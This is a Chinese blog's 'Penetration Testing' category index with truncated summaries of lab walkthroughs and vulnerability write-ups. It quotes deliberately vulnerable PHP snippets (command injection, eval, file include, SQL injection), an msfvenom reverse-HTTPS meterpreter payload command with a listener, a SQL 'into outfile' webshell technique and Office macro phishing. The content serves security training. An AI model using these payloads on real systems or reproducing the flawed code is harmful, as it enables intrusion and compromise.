随笔分类 - Penetration Testing
摘要:Nacos 介绍 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云
阅读全文
摘要:一、概述 Lanproxy内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)今天给大家带来的是 Lanproxy 遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。 该漏洞允许读取/../conf/config.p
阅读全文
摘要:影响范围 Spring Framework 5.2.0 - 5.2.2 Spring Framework 5.1.0 - 5.1.12 Spring Framework 5.0.0 - 5.0.15 漏洞类型 反射型文件下载漏洞(RFD) 利用条件 1、响应header是通过org.springfr
阅读全文
摘要:概述: 根据OSI网络模型角度分析大致可分为三类: 分类: 网络层:IPv6隧道 ICMP隧道 GRE隧道传输层:TCP隧道 UDP隧道 常规端口转发应用层:SSH隧道 HTTP隧道 HTTPS隧道 DNS隧道 一、网络层 工具: IPv6隧道Socat6 6tunnel nt6tunnel Icm
阅读全文
摘要:Example 1 源码: <?php require "../header.php" ; $ld = ldap_connect("localhost") or die("Could not connect to LDAP server"); ldap_set_option($ld, LDAP_OP
阅读全文
摘要:Example 1 源码: <?php require_once("../header.php"); ?><pre><?php system("ping -c 2 ".$_GET['ip']);?></pre><?php require_once("../footer.php"); ?> 解释:ip
阅读全文
摘要:Example 1 源码: <?php require_once("../header.php"); ?> <?php $str="echo \"Hello ".$_GET['name']."!!!\";"; eval($str);?><?php require_once("../footer.ph
阅读全文
摘要:Example 1 源码: <?php require_once '../header.php'; ?> <?php if ($_GET["page"]) { include($_GET["page"]); } ?> <?php require_once '../footer.php'; ?> 解释
阅读全文
摘要:Example 1 源码: <?php $UploadDir = '/var/www/files/'; if (!(isset($_GET['file']))) die(); $file = $_GET['file']; $path = $UploadDir . $file; if (!is_fil
阅读全文
摘要:sql1 源码: <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name='"; $sql .= $_GET["name"]."'"; $result =
阅读全文
摘要:官方地址:PentesterLab: Learn Web App Pentesting! Web for Pentester 也是一个web的靶场,如下图 XSS1: 源代码: <?php echo $_GET["name"];?> 解释:无任何过滤,直接插入payload即可 paylod: <s
阅读全文
摘要:一、使用 AFLogical 提取所有联系人、通话记录和短信 AFLogical 是由 viaForensics 编写的工具,以便从设备创建逻辑采集并将结果呈现给取证员。它从设备中提取一些关键组件,包括短信,联系人和通话记录。 /mnt/sdcard/forensics/日期 二、使用 Andril
阅读全文
摘要:一、客户端侧的攻击 1. 文件分析 说明:识别语言和开发框架,不同用户瘦客户端和胖客户端 举例:配置不合理将敏感数据放着在客户端配置文件中 防御:请勿将相关配置凭证放置在客户端用户目录 2. 二进制分析反编译分析 说明:反编译静态分析,动态调试分析 举例:硬编码写死在客户端 防御:请勿写死在客户端代
阅读全文
摘要:Kail Linux # msfvenom -p java/meterpreter/reverse_https LHOST=10.10.202.130 -f jar -o meterpreter-https.jar msf5 > use exploit/multi/handler msf5 expl
阅读全文
摘要:需要一个密码强度正则表达式在用户注册时校验用户密码强度:密码至少8个字符,包括1个大写字母,1个小写字母和1个数字或特殊字符,例如#,?,!。网上搜索了一些解决方案分享给大家。 方案一 至少8-16个字符,至少1个大写字母,1个小写字母和1个数字,其他可以是任意字符: /^(?=.*[a-z])(?
阅读全文
摘要:1. 找到源码的map文件,然后下载 2. 使用npm 安装reverse-sourcemap npm install --global reverse-sourcemap 3. 进行还原操作 ╰─ reverse-sourcemap --helpreverse-sourcemap - Revers
阅读全文
摘要:知识点: 什么是SMB 服务器消息块(SMB)协议是一种网络文件共享协议,在Microsoft Windows中实现称为Microsoft SMB协议。SMB允许您共享文件,磁盘,目录,打印机等。在Windows 2000之前,SMB过去通过TCP / IP端口139与NetBIOS一起运行。因此,
阅读全文
摘要:环境搭建: sudo apt install docker.io git clone https://github.com/vulhub/vulhub.git cd vulhub fastjson 1.2.24-rce 目录 启动容器 sudo docker-compose up HTTP访问809
阅读全文
摘要:关于PHP网站报错性注入拿shell的方法,定位到报错在某个字段上的利用方式: 条件1: 爆出了网站的物理路径 条件2:MySQL具有into outfile权限 SQL语句为: 假如字段为2: union+select+1,payload的十六进制,3,4,5+into+outfile+'/var
阅读全文
摘要:背景: 最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。 常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。 那么今天主要利用Windows office 宏进行远程攻击。 环境: kail Linux 2018 xface Win
阅读全文
浙公网安备 33010602011771号